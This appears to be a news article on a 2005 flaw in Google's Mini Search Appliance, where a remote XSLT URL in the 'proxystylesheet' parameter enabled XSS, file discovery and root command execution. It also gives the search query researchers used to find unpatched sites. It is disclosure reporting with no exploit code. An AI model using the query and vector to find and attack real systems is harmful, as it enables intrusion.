Systems Using Google Mini Search Appliance May Be At Risk
Google, the number one search engine used by Internet users, provides web developers and users certain tools for customizing searches to the user’s liking. While Google’s reputation is nearly impeccable and its products are generally thought of as “safe”, a problem first reported on June 10, 2005 causes some concern over whether such blind faith is wise.
According to The Metasploit Project, in August 2005, a patch had to be issued by Google to fix security flaws in its Mini Search Appliance. The patch, GA-2005-08-m, fixes problems with the Mini’s ‘proxystylesheet’ implementation. By design, the Google Mini Search Appliance allows system commands and java code execution by users that would not ordinarily have such system privileges. (See Google Answers.) But, because the search interface uses the ‘proxystylesheet’ form variable to determine what style sheet to apply to the search results, an opportunity for feeding the script dangerous code is presented. The malicious user can supply a variable that is either a local file name or an HTTP URL.
Researcher H. D. Moore says “This feature can be abused to perform cross-site scripting (XSS), file discovery, service enumeration, and arbitrary command execution” if the abuser chooses to use a remote URL. Moore provides an exploit example at Metasploit.com. The example shows how using a remote URL to an XSLT stylesheet could be used to obtain a root shell. Prior to Google’s patch, the user executing the code did not need sufficient system rights for the code to run and no checks were made prior to execution to ensure that the URL parameter was allowable.
While Google has stated that its Mini Search Appliance poses no security issues and has been thoroughly tested, Moore performed some random testing using a Google query on “inurl:proxystylesheet”. Of the 43 websites tested, 23 were confirmed vulnerable and unpatched.
More information on the patch for Google’s customers who have purchased its $2995 Mini Search Appliance is available at the Google Enterprise Solutions support website. The Google support group online for Google-Mini may also shed some light into security concerns of Google’s products and appropriate fixes.